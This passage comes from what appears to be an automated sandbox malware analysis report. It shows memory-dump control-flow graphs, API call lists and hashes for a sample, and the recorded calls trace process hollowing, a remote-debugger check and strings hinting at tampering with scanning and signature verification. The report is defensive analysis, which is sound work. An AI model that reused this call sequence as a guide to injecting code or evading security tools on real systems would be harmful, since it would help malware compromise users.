                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                • API String ID: 2388221946-51457883
                                                                                                                                • Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                • Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
                                                                                                                                • Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                • Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 6883 2b28d6e-2b28d73 6885 2b28d78-2b28d7d 6883->6885 6885->6885 6886 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6885->6886 6917 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6886->6917 6918 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6886->6918 6918->6917 6962 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6918->6962 7071 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6962->7071 7072 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 7072->7180 7253 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 7180->7253 7254 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7180->7254 7344 2b299e3-2b29a09 call 2b27a2c 7253->7344 7345 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7253->7345 7281 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7254->7281 7281->6917 7385 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 7281->7385 7352 2b29a7c-2b29b7d call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7344->7352 7345->7352 7352->7281 7436 2b29ec3-2b2a8b2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 7385->7436 7437 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 7385->7437 7436->6917 7437->7436
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                • GetThreadContext.KERNEL32(000008A0,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                                  • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                  • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                  • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                • API String ID: 3386062106-51457883
                                                                                                                                • Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                                • Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
                                                                                                                                • Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                                • Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 10945 2b15acc-2b15b0d GetModuleFileNameA RegOpenKeyExA 10946 2b15b4f-2b15b92 call 2b15908 RegQueryValueExA 10945->10946 10947 2b15b0f-2b15b2b RegOpenKeyExA 10945->10947 10952 2b15b94-2b15bb0 RegQueryValueExA 10946->10952 10953 2b15bb6-2b15bd0 RegCloseKey 10946->10953 10947->10946 10948 2b15b2d-2b15b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2b15bd8-2b15c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2b15cf2-2b15cf9 10950->10954 10955 2b15c0f-2b15c13 10950->10955 10952->10953 10956 2b15bb2 10952->10956 10958 2b15c15-2b15c19 10955->10958 10959 2b15c1f-2b15c35 lstrlenA 10955->10959 10956->10953 10958->10954 10958->10959 10960 2b15c38-2b15c3b 10959->10960 10961 2b15c47-2b15c4f 10960->10961 10962 2b15c3d-2b15c45 10960->10962 10961->10954 10964 2b15c55-2b15c5a 10961->10964 10962->10961 10963 2b15c37 10962->10963 10963->10960 10965 2b15c84-2b15c86 10964->10965 10966 2b15c5c-2b15c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10954 10967 2b15c88-2b15c8c 10965->10967 10966->10965 10967->10954 10968 2b15c8e-2b15cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2b15cc0-2b15cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                                • RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                • API String ID: 1759228003-2375825460
                                                                                                                                • Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                                • Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
                                                                                                                                • Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                                • Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13205 2b2894c-2b28971 LoadLibraryW 13206 2b28973-2b2898b GetProcAddress 13205->13206 13207 2b289bb-2b289c1 13205->13207 13208 2b289b0-2b289b6 FreeLibrary 13206->13208 13209 2b2898d-2b289ac call 2b27d78 13206->13209 13208->13207 13209->13208 13212 2b289ae 13209->13212 13212->13208
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                • API String ID: 1002360270-4067648912
                                                                                                                                • Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                                • Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
                                                                                                                                • Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                                • Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13222 2b2f744-2b2f75e GetModuleHandleW 13223 2b2f760-2b2f772 GetProcAddress 13222->13223 13224 2b2f78a-2b2f792 13222->13224 13223->13224 13225 2b2f774-2b2f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2b2f786 13225->13226 13226->13224
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                • API String ID: 35162468-539270669
                                                                                                                                • Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                                • Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
                                                                                                                                • Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                                • Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                                • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                                • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                                • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                                  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1897104825-0
                                                                                                                                • Opcode ID: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
                                                                                                                                • Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
                                                                                                                                • Opcode Fuzzy Hash: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
                                                                                                                                • Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                                • Opcode ID: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
                                                                                                                                • Instruction ID: 28ddd1e5e8056753ebbe205609be8432b399c9c2c0731bab44ad2b1bc0701bb1
                                                                                                                                • Opcode Fuzzy Hash: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
                                                                                                                                • Instruction Fuzzy Hash: CD413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                Memory Dump Source
